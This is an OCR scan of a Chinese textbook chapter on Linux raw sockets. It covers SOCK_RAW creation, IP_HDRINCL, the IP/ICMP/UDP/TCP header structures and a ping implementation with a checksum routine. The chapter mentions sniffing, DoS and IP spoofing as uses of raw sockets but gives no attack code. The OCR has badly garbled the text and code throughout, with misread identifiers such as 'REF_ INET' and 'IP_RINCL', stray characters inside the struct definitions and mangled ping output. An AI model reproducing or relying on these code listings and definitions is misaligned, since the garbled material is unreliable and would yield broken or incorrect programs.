
OOOOODDO 


13.1 概 述 


YN 


前 面 儿童 介绍 了 基础 的 套 接 字 知识 、 流 式 套 接 字 (SOCK_STREAM) 和 数据 报 套 接 字 
(SOCK_DGRAM) 涵盖 了 一 般 应 用 层次 的 TCP/IP 应 用 ， 如 图 13.1 所 示 。 应 用 层 位 于 


TCP/UDP 层 之 上 ， 所以, 这 两 类 套 接 字 几乎 涵盖 了 所 有 的 应 用 层 需 求 ， 几 乎 所 有 的 应 月 
序 都 可 以 使 用 这 两 类 方式 来 实现 。 

当 深入 地 考虑 一 些 问题 时 ， 就 会 不 知 如 何 入 手 ， 例 如 : 

口 发 送 一 个 自 定义 的 耳 包 。 

口 发 送 ICMP 数据 报 。 

口 网 卡 的 侦 听 模式 ， 监 听 网 络 上 的 数据 包 。 

口 伪装 四 地址 。 

口 自 定义 协议 的 实现 。 


日 程 


要 解决 这 些 问 题 ， 需 要 了 解 另 一 类 套 接 字 ， 这 就 是 原始 套 接 字 。 原 始 套 接 字 主要 应 用 
在 底层 网 络 编程 上 ， 同 时 也 是 网 络 黑客 的 必 备 手段 。 例 如 sniffer、 拒 绝 服务 (DoS)、 人 P 地 


址 欺骗 等 都 需要 在 原始 套 接 字 的 基础 上 实现 。 


与 原始 套 接 字 对 应 ， 之 前 的 TCP、UDP 的 套 接 字 称 为 标准 套 接 字 ， 如 图 13.2 所 示 为 
标准 套 接 字 与 原始 套 接 字 之 间 的 关系 。 标 准 套 接 字 与 网 络 协议 栈 的 TCP、UDP 层 打 交道 ， 
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而 原始 套 接 字 则 与 IP 层级 网 络 协议 栈 核心 打交道 。 


应 用 程序 


TCP/IP 四 层 参考 模型 用 户 空间 


应 用 层 
(E-mail 、telneb) 内 核 空间 本 


传输 层 
(TCP、UDP) 


网 络 互联 层 
(了 


主机 到 网 络 
(网 月 


图 13.1 TCP/IP 四 层 参 考 模型 图 13.2 原始 套 接 字 及 标准 套 接 字 与 内 核 的 关系 


上 使 


原始 套 接 字 提 供 以 下 3 种 标准 套 接 字 不 具备 的 功能 。 
口 使 用 原始 套 接 字 可 以 读 / 写 ICMP、IGMP 分 组 。 例 如 ping 程序 就 使 用 原始 套 接 字 发 


送 ICMP 回 显 请 求 ， 并 接受 ICMP 回 显 应 答 。 用 于 多 播 的 守护 程序 mrouted， 同 样 适 
用 原始 套 接 字 来 发 送 和 接收 IGMP 分 组 。 上 述 功 能 同样 允许 使 用 ICMP 或 者 IGMP 
构造 的 应 用 程序 完全 作为 用 户 进程 处 理 ， 而 不 必 再 增加 过 多 的 内 核 编码 。 例 如 ， 路 
由 发 现 守 护 进 程 即 以 这 种 方式 构造 。 它 处 理 内 核 完全 不 知道 的 两 个 ICMP 消息 。 
使 用 原始 套 接 字 可 以 读 写 特 殊 的 IP 数据 报 ， 内 核 不 处 理 这 些 数据 报 的 协议 字段 。 
大 多 数 内 核 只 处 理 1 (ICMP) 、2 (IGMP) 、3 (TCP) 和 17 (UDP) 的 数据 报 。 
但 协议 字段 还 可 能 为 其 他 值 。 例如，OSPF 路 由 协议 就 不 适用 TCP 或 者 UDP， 而 直 
接 使 用 卫 ， 将 IP 数据 报 的 协议 字段 设 为 89。 因 此 ， 由 于 这 些 数据 报 包含 内 核 完 全 
不 知道 的 协议 字段 ， 实 现 OSPF 协议 的 gated 程序 必须 使 用 原始 套 接 字 来 读 写 它们 。 
使 用 原始 套 接 字 ， 利 用 函数 setsockopt() 设 置 套 接 字 选 项 ， 使 用 IP_HDRINGCL 可 
以 对 IP 头 部 进行 操作 ， 因 此 可 以 修改 IP 数据 和 人 P 层 之 上 的 各 层 数据 ， 构 造 自 己 
的 特定 类 型 的 TCP 或 者 UDP 的 分 组 。 


13.2 原始 套 接 字 的 创建 


原始 套 接 字 的 创建 使 用 与 通用 套 接 字 创建 的 方法 是 一 致 的 ， 只 是 在 套 接 字 类 型 的 选项 
用 的 是 另 一 个 SOCK RAW。 在 使 用 socket(O) 函 数 进行 函数 创建 完毕 的 时 候 ， 还 要 进行 


套 接 字 数据 中 格式 类 型 的 指定 ， 设 置 从 套 接 字 中 可 以 接收 到 的 网 络 数据 格式 。 


13.2.1 


SOCK_RAW 选项 


创建 原始 套 接 字 使 用 socket0 函 数 ， 第 二 个 参数 设置 为 SOCK _ RAW，socket() 函 数 可 以 
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创建 一 个 原始 套 接 字 。 下 面 的 代码 创建 一 个 AF_INET 协议 族 中 的 原始 套 接 字 ， 协 议 类 型 
为 protocol。 


int rawsock = socket (REF_ INET, SOCK RAW, protocol); 


原始 套 接 字 中 的 protocol， 一 般 情况 下 不 能 设置 为 0， 需 要 用 户 自己 设置 想 要 的 类 型 ， 
是 一 个 形 如 IPPROTO_xxx 的 常量 ， 在 文件 <netinet/in.h> 中 定义 。 例 如 ，IPPROTO_ICMP 
表示 是 一 个 ICMP 协议 。 

常用 协议 的 类 型 和 含义 如 下 所 示 。 可 以 设置 不 同 的 协议 ， 在 发 送 和 接收 数据 的 时 候 会 
得 到 不 同 的 数据 。 

口 IPPROTO _IP: IP 协议 ， 接 收 或 者 发 送 IP 数据 包 ， 包 含 卫 头 部 。 

口 IPPROTO_ICMP: ICMP 协议 ， 接 收 或 者 发 送 ICMP 的 数据 包 ， 卫 的 头 部 不 需要 

处 理 。 

口 IPPROTO_TCP: TCP 协议 ， 接 收 或 者 发 送 TCP 数据 包 。 

口 IPPROTO_UDP: UDP 协议 ， 接 收 或 者 发 送 UDP 数据 包 。 

口 IPPROTO_RAW: 原始 IP 包 。 


13.2.2 IP_HDRINCL 套 接 字 选项 


使 用 套 接 字 选 项 IP_HDRINCL 设置 套 接 字 , 在 之 后 进行 的 接收 和 发 送 时 ， 接 收 到 的 数 
据 包 含 IP 的 头 部 。 用 户 之 后 需要 对 耳 层 相关 的 数据 段 进 行 处 理 ， 例 如 IP 头 部 数据 的 设置 
和 分 析 ， 校 验 和 的 计算 等 。 设 置 方法 如 下 : 
int set = 1; 
if(setsockopt (rawsock, IPPROTO IP, IP_ HDRINCL, &set, sizeof(set))<0){ 
/* 错 误 处 理 */ 
} 


13.2.3 不 需要 bind() 函 数 

原始 套 接 字 不 需要 使 用 bind0) 函 数 ， 因 为 进行 发 送 和 接收 数据 的 时 候 可 以 指定 要 发 送 
和 接收 的 目的 地 址 的 卫 。 例 如 ， 使 用 函数 sendto0 和 函数 recvfrom() 来 发 送 和 接收 数据 ， 
sendto0 和 recvfrom() 函 数 分 别 需 要 指定 IP 地址。 


sendto (rawsock, data, datasize, 0, (struct sockaddr *) &to, sizeof (to) ) 
recvfrom(rawsock, data,size , 0,(struct sockaddr) &from, &len) ; 


当 系 统 对 socket 进行 绑 定 的 时 候 ， 发 送 和 接收 的 函数 可 以 使 用 snd0 和 recv0 及 read() 
和 write0 等 ， 不 需要 指定 目的 地 址 的 函数 。 


13.3 原始 套 接 字 发 送 报 文 
原始 套 接 字 发 送 报 文 有 如 下 原则 : 


口 通常 情况 下 可 以 使 用 sendto() 函 数 并 指定 发 送 目 的 地 址 来 发 送 数 据 ， 当 已 经 指定 了 
bind0) 目 标 地 址 的 时 候 可 以 使 用 write() 或 者 send() 发 送 数据 。 
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如 果 使 用 setsockoptO 设 置 了 选项 IP_ RINCL， 则 发 送 的 数据 缓冲 区 指向 IP 头 部 第 
一 个 字 节 的 头 部 ， 用 户 发 送 的 数据 包含 IP 头 部 之 后 的 所 有 数据 ， 需 要 用 户 自己 填 
写 卫 头 部 和 计算 校 验 ， 并 需要 对 所 包含 数据 进行 处 理 和 计算 。 

如 果 没 有 设置 IP_RINCL， 则 发 送 缓冲 区 指向 IP 头 部 后 面 数据 区 域 的 第 一 个 字 节 ， 
不 需要 用 户 填写 IP 头 部 ，IP 头 部 的 填写 工作 由 内 核 进行 ， 内 核 还 进行 校 验 和 的 
计算 。 


例如 sendto(rawsock,buffer,len,0,(struct sockaddr*)&to,sizeof(to))， 当 IP_RINCL 已 经 设 
置 的 时 候 ，buffer 指向 的 就 是 用 户 构建 包含 IP 头 部 在 内 的 数据 结构 。 如 果 IP_RINCL 没有 
设置 ， 则 buffer 指向 了 卫 头 部 后 面 缓冲 区 的 数据 ， 例 如 后 面 为 ICMP 数据 报 文 ， 则 需要 填 
写 ICMP 的 类 型 、 代 码 等 ， 并 计算 其 校 验 和 。 


13.4 原始 套 接 字 接 收报 文 


与 发 送 报 文 类 似 ， 接 收报 文 也 有 相似 的 规则 : 


口 
口 
口 


通常 可 以 使 用 recvfrom() 或 者 recv0 及 read() 获 得 数据 。 
当 设 置 了 IP_RINCL 后 ， 接 收 的 缓冲 区 为 IP 头 部 的 第 一 个 字 节 。 
当 没 有 设置 IP_RINCL 的 时 候 ， 接 收 的 缓冲 区 为 IP 数据 区 域 的 第 一 个 字 节 。 


接收 报 文 还 有 自己 的 一 些 特点 ， 主 要 有 如 下 儿 个 : 


口 


口 


口 
口 


对 于 ICMP 的 协议 ， 绝 大 部 分 数据 可 以 通过 原始 套 接 字 获得 ， 例 如 回 显 请 求 、 响 
应 、 时 间 戳 请 求 等 。 

接收 的 UDP 和 TCP 协议 的 数据 不 会 传 给 任何 原始 套 接 字 接 口 , 这些 协议 的 数据 需 
如 果 IP 以 分 片 形 式 到 达 ， 则 所 有 分 片 都 已 经 接收 到 并 重组 后 才 传 给 原始 套 接 字 。 
内 核 不 能 识别 的 协议 、 格 式 等 传 给 原始 套 接 字 ， 因 此 ， 可 以 使 用 原始 套 接 字 定 义 
用 户 自己 的 协议 格式 。 


原始 套 接 字 接收 报 文 的 规则 如 下 : 如 果 接 收 的 报 文 数据 中 的 协议 类 型 与 自 定 义 的 原始 
套 接 字 匹配 ， 那 么 将 接收 的 所 有 数据 复制 入 套 接 字 中 ;如 果 套 接 字 绑 定 了 本 地 地 址 ， 那 么 
只 有 当 接 收 的 报 文 数据 他 头 中 的 目的 地 址 等 于 本 地 地 址 时 , 接收 到 的 数据 才 复 制 到 套 接 字 
中 ; 如 果 套 接 字 定义 了 远 端 地 址 ， 那 么 ， 只 有 接收 数据 IP 头 中 对 应 的 源 地 址 与 远 端 地 址 匹 
配 ， 接 收 的 数据 才 复 制 到 套 接 字 中 。 


13.5 原始 套 接 字 报 文 处 理 时 的 结构 


本 节 将 介绍 进行 报 文 处 理 时 常用 的 数据 结构 ， 包 含 IP 头 部 、ICMP 头 部 、UDP 头 部 、 
TCP 头 部 。 使 用 这 些 数据 格式 对 原始 套 接 字 进行 处 理 ， 可 以 从 底层 获取 高 层 的 网 络 数据 。 


13.5.1 


IP 头 部 的 结构 


IP 头 部 结构 如 图 13.3 所 示 。 
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0 15 16 


31 


版 本 (4 位 ) | 首部 长 度 (4 位 。。 服务 类 型 (swy) | 


总 长 度 (16 位 ) 


标识 (16 位 ) 


| 标识 (3 位 片 偏 移 (13 位 ) 


生存 时 间 TTL (8 位 ) | 协议 类 型 (8 位 ) 


头 部 校 验 和 ( 16 位) 


源 IP 地 址 (32 位) 


20 个 字 


目的 IP 地 址 (32 位 ) 


选项 (32 位 ) 


数据 


图 13.3 ”IP 头 部 结构 示意 图 


在 Linux 下 结构 struct ip 的 数据 类 型 定义 如 下 : 


/* 

* 网 际 协议 结构 , IPv4, 参见 RFC 791 

*/ 

struct ip 

{ 

#if _ BYTE ORDER == _ LITTLE ENDIAN 
unsigned int ip hl:4; 
unsigned int ip v:4; 

#endif 加 

#if _ BYTE ORDER == _ BIG ENDIAN 
unsigned int ip v:4; 
unsigned int ip hl:4; 

#endif 
u int8 t ip tos; 

u short ip len; 
u short ip id; 
u short ip off; 


uu inte t ip ttl; 

u int8 t ip p; 

u_ short ip_sum; 

struct in addr ip src, ip dst; 
]} 


/* 如 果 为 小 端 */ 
/* 头 部 长 度 */ 
/* 版 本 */ 


/* 如 果 为 大 端 */ 
/* 版 本 */ 
/# 头 部 长 度 */ 


/*TOS, 服务 类 型 */ 
/* 总 长 度 */ 
/# 标 识 值 */ 

/* 段 偏 移 值 */ 


/*TTL, 生存 时 间 */ 

/* 协 议 类 型 */ 
/* 校 验 和 */ 
/* 源 地 址 和 目的 地 址 */ 


与 之 前 的 全 格 式 的 图 片 相对 比 ，Linux 成 员 的 示意 图 如 图 13.4 所 示 。 


13.5.2”ICMP 头 部 结构 


ICMP 的 头 部 结构 比较 复杂 ， 主 要 包含 消息 类 型 icmp_type、 消 息 代码 icmp_code、 校 
验 和 icmp_cksum 等 ,不 同 的 ICMP 类 型 其 他 部 分 有 不 同 的 实现 .ICMP 的 头 部 结构 如 图 13.5 


所 示 。 
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ip_hl ip_V ip_tos ip len 
ipid ip_off 
ip tl ipp ip_sum 
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图 13.4 Linux 结构 成 员 的 结构 示意 图 
0 7 8 15 16 31 
类 型 (8 位 )》 | 代码 (8 位 ) 校 验 和 (16 位 ) 


(此 部 分 不 同 的 类 型 和 代码 格式 不 同 ) 


图 13.5 ”ICMP 头 部 结构 示意 图 


1. ICMP 的 头 部 结构 


常用 的 ICMP 报 文 包括 ECHO-REQUEST (响应 请 求 消息 )、ECHO-REPLY〔〈 响 应 应 答 
消息 )、Destination Unreachable (目标 不 可 到 达 消 息 )、Time Exceeded (超时 消息 )、Parameter 
Problems (参数 错 误 消息 )、Source Quenchs( 源 抑制 消息 )、Redirects( 重 定向 消息 )、Timestamps 
(时 间 戳 消息 )、Timestamp Replies 时间 蕉 响应 消息 )、Address Masks( 地 址 抢 码 请 求 消息 )、 
Address Mask Replies (地址 掩 码 响应 消息 ) 等 ， 是 Internet 上 十 分 重要 的 消息 。 

后 面 章 节 中 所 涉及 的 ping 命令 、ICMP 拒绝 服务 攻击 、 路 由 欺骗 都 与 ICMP 协议 息 息 
相关 。ICMP 的 头 部 结构 代码 在 Linux 下 ， 如 下 所 示 。 


struct icmp 


Ul 

u int8 七 icmp type; /* 消 息 类 型 */ 

u int8 七 icmp code; /* 消 息 类 型 的 子 码 */ 

u int16 七 icmp cksum; /* 校 验 和 */ 

union 

{ 
u char ih pptr; /*ICMP PARAMPROB*/ 
struct in addr ih gwaddr; /* 网 关 地 址 */ 
struct ih idsedq /* 显 示 数 据 报 */ 
u int16 t icd id; /* 数 据 报 ID*/ 
u int16 t icd seq; /* 数 据 报 的 序号 */ 


Ss 
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} ih idseq; 
want32 t Lh voids 
/*ICMP UNREACH NEEDFRAG -- Path MTU Discovery (RFC1191)*/ 
struct ih pmtu 
{ 
u int16 t ipm void; 
u int16 七 ipm nextmtu; 
} ih pmtu; 
struct ih rtradv 
{ 
u int8 t irt num addrs; 
UV inte t rt Wpay 
u int16 七 irt lifetime; 
14h rtradvs 
} icmp hun; 


#define icmp pptr icmp hun.ih pptr 
#define icmp gwaddr icmp hun.ih gwaddr 
#define icmp id icmp hun.ih idseq.icd id 
#define icmp seq icmp hun.ih idseq.icd seq 
#define icmp void icmp hun.ih void 
#define icmp pmvoid icmp hun.ih pmtu.ipm void 
#define icmp nextmtu icmp hun.ih pmtu.ipm nextmtu 
#define icmp num addrs icmp hun.ih rtradv.irt num addrs 
#define icmp wpa icmp hun.ih rtradv.irt wpa 
#define icmp lifetime icmp hun.ih rtradv.irt lifetime 
union 
{ 
struct 
{ 
u int32 t its otime; /* 时 间 戳 协议 请 求 时 间 */ 
u int32 t its rtime; /* 时 间 戳 协议 接收 时 间 */ 
u int32 t its ttime; /* 时 间 戳 协议 传输 时 间 */ 
lid ta 
struct 
Struct ip. idi 2p7 
/*options and then 64 bits of data*/ 
} id ip; 
struct icmp ra addr id radv; 
u int32 t id mask; /* 子 网 掩 码 的 子 网 掩 码 */ 
unee eh gq dqatallls /+ 数据 */ 
} icmp dun; 
#define icmp otime icmp dun.id ts.its otime  ”/* 时 间 蕉 协议 请 求 时 间 */ 
#define icmp rtime icmp dun.id ts.its rtime  /* 时 间 蕉 协议 接收 时 间 */ 
#define icmp ttime icmp dun.id ts.its ttime  /* 时 间 蕉 协议 传输 时 间 */ 
#define icmp ip icmp dun.id ip.idi ip 
#define icmp radv icmp dun.id radv 
#define icmp mask icmp dun.id mask /* 子 网 掩 码 的 子 网 掩 码 */ 
#define icmp data icmp dun.id data 


}; 
对 Linux 代码 的 位 置 参见 图 13.6 所 示 。 
2. 不 同类 型 的 ICMP 请 求 


子 网 抢 码 请 求 协议 的 位 置 参见 图 13.7 所 示 ， 增 加 了 标识 符 icmp_id、 序 列 号 icmp_seq 
和 掩 码 icmp_mask。 
在 Linux 中 ， 时 间 戳 请求 协议 的 示意 图 参见 图 13.8， 相 对 于 通用 示意 图 ， 增 加 了 标识 
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0 7 8 15 16 31 


icmp type icmp code icmp_cksum 


(此 部 分 不 同 的 类 型 和 代码 格式 不 同 ) 


图 13.6 Linux 中 ICMP 协议 的 通用 定义 示意 图 


0 7 8 15 16 31 
icmp type icmp code | icmp_cksum | | 
icmp id | icmp seq | 12 字 节 
icmp_mask | | 


图 13.7 Linux 中 子 网 掩 码 协 议 的 示意 图 


符 icmp_id、 序 列 号 iemp_seq 及 表示 请 求 时 间 的 icmp_ctime、 接 收 时 间 的 icmp_rtime 和 传 
输 时 间 icmp_ttime。 


0 7 8 15 16 31 
icmp type icmp code icmp_cksum 
icmp id icmp_seq 
icmp_otime 20 字 节 
icmp_rtime 
icmp ttime 


图 13.8 ”Linux 中 时 间 戳 请 求 协议 的 示意 图 


13.5.3 UDP 头 部 结构 


UDP 的 头 部 结构 包含 发 送 端的 源 端口 号 、 数 据 接收 端的 目的 端口 号 、UDP 数据 的 长 
度 ， 以 及 UDP 的 校 验 和 等 信息 。UDP 头 部 结构 如 图 13.9 所 示 。 
0 15 16 31 
源 端口 号 (16 位 ) | 目的 端口 号 (16 位 ) 


t 
8 个 字 节 
UDP 数 据 长 度 ( 16 位) | UDP 以 验 和 (16 位) | 


数据 


图 13.9 UDP 头 部 结构 示意 图 


在 Linux 下 UDP 头 部 的 结构 类 型 为 struct udphdr， 代 码 如 下 所 示 ， 主 要 包含 源 端口 、 
目的 端口 、UDP 长 度 和 校 验 和 。 在 Linux 下 有 两 套 定义 ， 如 果 喜 欢 BSD 样式 ， 需 要 定义 
宏 _FAVOR_BSD。 


ls 
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#ifdef _ FAVOR BSD 


struct udphdr 


{ 
u int16 七 
u int1l6 七 
u int1l6 七 
U_int16 七 

] 

#else 

struct udphdr 

{ 
u int16 七 
u int16 七 
u int16 七 
U_int16 七 

]} 

#endif 


uh_ sport; 
uh dport; 
uh ulen; 
uh_sum; 


source; 
dest; 
len; 
check; 


户 层 网 络 编程 


Linux 上 


/* 如 果 喜 欢 BSD 样式 */ 


/* 源 地 址 端口 */ 
/* 目 的 地 址 端口 */ 
/*UDP 长 度 */ 
/*UDP 校 验 和 */ 


/*Linux 样式 */ 


/* 源 地 址 端口 */ 
/* 目 的 地 址 端口 */ 
/*UDP 长 度 */ 
/*UDP 校 验 和 */ 


与 之 前 的 示意 图 对 应 ， 在 Linux 下 UDP 的 示意 图 ， 如 图 13.10 所 示 。 


0 


15 16 


1 


Source 


可 
| 


数据 


图 13.10 Linux 环境 下 UDP 头 部 示意 图 


13.5.4 TCP 头 部 结构 


TCP 的 头 部 结构 主要 包含 发 送 端的 源 端口 、 接 收 端的 目的 端口 、 数 据 的 序列 号 、 


| 


个 数据 的 确认 号 、 滑 动 窗口 大 小 、 数 据 的 校 验 和 、 紧 急 数据 的 偏 移 指针 ， 以 及 一 些 控制 位 


等 信息 。TCP 头 部 结构 如 图 13.11 所 示 。 
0 1516 31 
源 端口 号 ( 16 位 ) 目的 端口 号 (16 位 ) 
序列 号 (32 位 ) 
确认 号 (32 位 ) 网 
头 部 长 度 (4 位 | 保留 (6 位 | URG| AcK| PsH [rsr sy [Fm 窗口 尺寸 (16 位 ) he 
TCP 校 验 和 (16 位 ) 紧急 指针 ( 16 位) 
选项 (32 位 ) 
数据 


图 13.1 


1 TCP 头 部 结构 示意 图 


在 Linux 下 TCP 头 部 结构 struct tcphdr 代码 定义 如 下 ， 主 要 包含 源 端 口 、 目 的 端口 、 
序列 号 、 确 认 号 、 滑 动 窗口 、 校 验 和 、 
连接 重 置 、 连 接 快速 复制 、 确 认 序号 、 


“382“ 


紧急 指针 ， 以 及 一 些 控制 位 〈 连 接 请 求 、 连 接 终 止 、 
紧急 标志 、 拥 塞 标志 等 )。 对 于 小 端 和 大 端 系统 ， 有 
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两 套 不 一 致 的 定义 。 
struct tcphdr 
{ 
ul6 source; /* 源 地 址 端口 */ 
_ul6 dest; /* 目 的 地 址 端口 */ 
_u32 seg; /* 序 列 号 */ 
_u32 ack seq; /* 确 认 序列 号 */ 
#if defined( LITTLE ENDIAN BITFIELD) 
_ul6 resl:4, /* 保 留 */ 
doff:4, /* 偏 移 */ 
Ein:1, /* 关 闭 连接 标志 */ 
syn:1, /* 请 求 连接 标志 */ 
zst:s1y /* 重 置 连接 标志 */ 
psh:1, /* 接 收 方 尽快 将 数据 放 到 应 用 层 标志 */ 
ack:1, /* 确 认 序号 标志 */ 
urg:1, /* 紧 急 指针 标志 */ 
ece:1， /*#+ 拥 塞 标志 位 */ 
Cwr:1; /# 拥 塞 标志 位 */ 
#elif defined( BIG ENDIAN BITFIELD) 
_ul6 doff:4, /* 偏 移 */ 
resl:4, /* 保 留 */ 
cwr:1, /* 拥 塞 标 志 位 */ 
ece:1， /* 拥 塞 标志 位 */ 
十 9535 /* 紧 急 指 针 标 志 */ 
ack:1, /* 人 确认 序号 标志 */ 
psh:1, /* 接 收 方 尽快 将 数据 放 到 应 用 层 标志 */ 
eae /* 重 置 连接 标志 */ 
syn:1, /* 请 求 连接 标志 */ 
Ed /* 关 闭 连 接 标志 */ 
#else 
#error "Adjust your <asm/byteorder.h> defines" 
#endif 
_ ul6 window; /* 滑 动 窗口 大 小 */ 
_ ul16 check; /* 校 验 和 */ 
6 gE /* 紧 急 字 段 指针 */ 


}; 


Linux 定义 的 数据 结构 在 TCP 示意 图 中 的 表示 ， 如 图 13.12 所 示 。 


0 15 16 31 
Source dest 
seq 
ack seq 
20 个 字 
doff(4bits) resl (4bits) |cwr| ece| urg ack [psn rst syn | fin window 
check urg_ ptr 
选项 (32 位 ) 
数据 


图 13.12 


Linux 下 TCP 头 部 结构 定义 示意 
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13.6 ”ping 的 例子 


E 机 发 送 ICMP ECHO_REQUEST 请 求 并 接收 目的 主机 返 


回 的 响应 报 


文 ， 用 来 检验 本 地 主机 和 远程 的 主机 是 否 连接 。 例 如 使 用 ping 命令 来 测试 本 机 是 否 与 外 界 


的 网 络 相 连通 。 


$ ping www.sina.com.cn 


PING tucana.sina.com.cn (111. 
dns250.o0nline. 


64 bytes from 
time=28.2 ms 
64 bytes from 
time=28.5 ms 
64 bytes from 
time=28.1 ms 
64 bytes from 
time=30.3 ms 
64 bytes from 
time=28.5 ms 
64 bytes from 
time=28.7 ms 
让 


dns250.online 


dns250.online 


dns250.online 


dns250.online. 


dns250.online . 


161.78.250) 56(84) 
让 由 昌 了 


tj 
-tj 
-tj 


.tj. 


tj 


tj 


cn 


-Cn 


Cn 


cn 


Cn 


-Cn 


人 
(ET 
(> 
[Fh 


(a 


161.78 


161.78 


161.78 


161.78 


161.78 


LOGl-78 


--- tucana.sina.com.cn ping statistics --- 
6 packets transmitted, 6 received, 0% packet loss, time 5009ms 
rtt min/avg/max/mdev = 28.199/28.763/30.349/0.744 ms 


本 机 和 远程 的 主机 是 连通 的 ， 但 响应 时 间 也 是 比较 理想 的 。 


13.6.1 协议 格式 


bytes of data. 


a 民 
250s 
250)s 
A 
2250 


pl 


icmp_req=1 
icmp_req=2 
icmp_req=3 
icmp_req=4 
icmp_req=5 


icmp req=6 


tt1=128 


tt1=128 


ttl=128 


ttl=128 


tt1=128 


ttl=128 


图 13.13 中 已 经 对 ICMP 协议 的 报 文 格式 进行 了 说 明 。ping 的 客户 端 方式 的 类 型 为 8， 


代码 值 为 0， 表示 ICMP 的 回 显 请 求 。 类 型 为 0， 代码 为 0 时 ， 是 ICMP 


为 16 位 的 crc16 的 算法 。 


。384 。 


0 7 8 


15 16 


31 


| 起 (8 位 ) | 代码 (8 位 》 | 


校 验 和 (16 位 ) 


(此 部 分 不 同 的 类 型 和 代码 格式 不 同 ) 


图 13.13 ICMP 报 文 的 数据 格式 


如 图 13.14 所 示 为 ping 所 使 用 的 类 型 和 代码 格式 。 包 含 16 位 的 标识 符 和 16 位 的 序列 
号 。 序 列 号 是 用 于 标识 发 送 或 者 响应 的 序号 ， 而 标识 符 通 常用 于 表明 发 送 和 接收 此 报 的 用 
户 ， 一 般 用 进程 的 PID 来 识别 。 
例如 ， 一 个 用 户 的 进程 PID 为 1000, 发 送 了 一 个 序列 号 为 1 的 回 显 请 求 报 文 ， 当 此 报 
文 被 目的 主机 正确 处 理 并 返回 后 ， 可 以 用 PID 来 识别 是 否 为 当前 的 用 户 ， 并 且 用 序列 号 来 


回 显 应 答 。 校 验 和 
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0 7 8 15 16 31 
(品名) 代码 (0) 校 验 和 J 
标识 符 序列 号 | 
占 位 字段 


图 13.14 ”ping 的 数据 格式 
识别 哪个 报 文 被 返回 。 通 过 发 送 报 文 到 目的 主机 并 接受 响应 ， 可 以 计算 发 送 和 接收 二 者 之 
间 的 时 间 差 ， 来 判断 网 络 的 状况 。 
如 图 13.15 所 示 ，ping 程序 一 般 按照 图 中 的 框架 进行 设计 。 主 要 分 为 发 送 数据 和 接收 
数据 及 计算 时 间 差 。 发 送 数据 对 组 织 好 的 数据 进行 发 送 ， 接 收 数据 从 网 络 上 接收 数据 并 判 
断 其 合法 性 ， 例 如 判断 是 否 本 进程 发 出 的 报 文 等 。 


区 

计算 发 送 数据 长 ， 
区 

计算 时 间 差 


图 13.15 ping 程序 的 基本 框架 
由 于 ICMP 必须 使 用 原始 套 接 字 进行 设计 , 要 手动 设置 IP 的 头 部 和 ICMP 的 头 部 并 进 
行 校 验 。 
13.6.2” 校 验 和 函数 
TCP/IP 协议 栈 使 用 的 校 验算 法 是 比较 经 典 的 ， 对 16 位 的 数据 进行 累加 计算 ， 并 返回 
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计算 结果 。 需 要 注意 的 是 ， 对 奇数 个 字 节 数据 的 计算 ， 是 将 最 后 的 有 效 数据 作为 最 高 位 的 
字 节 ， 低 字 节 填充 了 0。 


/*CRC16 校 验 和 计算 icmp_cksum 


参数 : 
data: 数 据 
len: 数 据 长 度 
返回 值 : 
计算 结果 , short 类 型 
# 
static unsigned short icmp cksum(unsigned char *data, int len) 
int sum=0; /* 计 算 结 果 */ 
int odd = len & 0x01; /* 是 否 为 奇数 */ 


/* 将 数据 按照 2 字 节 为 单位 累加 起 来 */ 
while( len & Oxfffe) { 
sum += *(unsigned short*)data; 
data += 27 
len -=2; 


} 
/* 判 断 是 否 为 奇数 个 数据 , 若 ICMP 报头 为 奇数 个 字 节 ,会 剩 下 最 后 一 个 字 节 */ 
i£({ odd) { 

unsigned short tmp = ((*data)<<8) &0xff00; 

sum += tmp; 


加 


sum = (sum >>16) + (sum & Oxffff); /* 高 低位 相 加 */ 
sum += (sum >>16) ，; /* 将 溢出 位 加 入 */ 
return ~sum; /* 返 回 取 反 值 */ 


13.6.3 设置 ICMP 发 送 报 文 的 头 部 
对 于 回 显 请 求 的 ICMP 报 文 ，13.5 节 介绍 的 ICMP 结构 可 以 简化 为 如 下 形式 : 


struct icmp 
{ 


uint8 t icmp type; /+* 消 息 类 型 */ 
u int8 t icmp code; /* 消 息 类 型 的 子 码 */ 
u int16 t icmp cksum; /* 校 验 和 */ 
union 
{ 
struct ih idseq /* 显 示 数 据 报 */ 
7 /* 数 据 报 ID*/ 
u int16 t icd seq; /* 数 据 报 的 序号 */ 
}ih idseqg; 
}icmp_hun; 
#define icmp id icmp hun.ih idseq.icd id 
#define icmp_seq icmp_ hun.ih idseq.icd seq 
union 
nee laatarl /* 数 据 */ 


}icmp dun; 
#define icmp data icmp_ dun.id data 
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即 仅 包 含 消 息 类 型 、 消 息 代码 、 校 验 和 、 数 据 报 的 ID、 数 据 报 的 序列 号 及 ICMP 数据 
段 几 个 部 分 。 在 校 验 和 的 值 计 算 之 前 ， 其 他 的 值 应 该 先进 行 填充 ， 而 校 验 和 也 需要 设置 为 
0 来 占 位 ， 然 后 计算 真正 的 校 验 和 值 。 

ICMP 回 显 的 数据 部 分 可 以 任意 设置 ， 但 是 以 太 网 包 的 总 长 度 不 能 小 于 以 太 网 的 最 小 
值 ， 即 总 长 度 不 能 小 于 46。 由 于 卫 头 部 为 20 字 节 ，ICMP 头 部 为 8 个 字 节 ， 以 太 网 头 部 
占用 14 个 字 节 ， 因 此 ICMP 回 显 包 的 最 小 值 为 46-20-8-14=4 个 字 节 。 

口 ICMP 回 显 请 求 的 类 型 为 8， 即 ICMP_ECHO。 

口 ICMP 回 显 请 求 的 代码 值 为 0。 

口 ICMP 回 显 请 求 的 序列 号 是 一 个 16 位 的 值 ， 通 常 由 一 个 递增 的 值 生成 。 

口 ICMP 回 显 请 求 的 ID 用 于 区 别 ， 通 常用 进程 的 PID 填充 。 

进行 ICMP 头 部 校 验 的 代码 如 下 : 

/* 设 置 ICMP 报头 */ 

static void icmp pack(struct icmp *icmph, int seq, struct timeval *tv, int 

length ) 

R 


unsigned char i = 0; 


/* 设 置 报头 */ 


icmph->icmp type = ICMP ECHO; /*ICMP 回 显 请 求 */ 

icmph->icmp code = 0; /*code 值 为 0*/ 

icmph->icmp cksum = 0; /* 先 将 cksum 值 填写 0, 便于 之 后 的 cksum 计 算 */ 
icmph->icmp_seq = seq; /#* 本 报 的 序列 号 */ 

icmph->icmp id = pid &0xffff; /* 填 写 PID*/ 


for(i = 0; i< length; i++) 
icmph->icmp datal[i] = i; 
/* 计 算 校 验 和 */ 
icmph->icmp_cksum = icmp cksuml( (unsigned char*)icmph, length); 
. 


13.6.4 剥离 ICMP 接受 报 文 的 头 部 


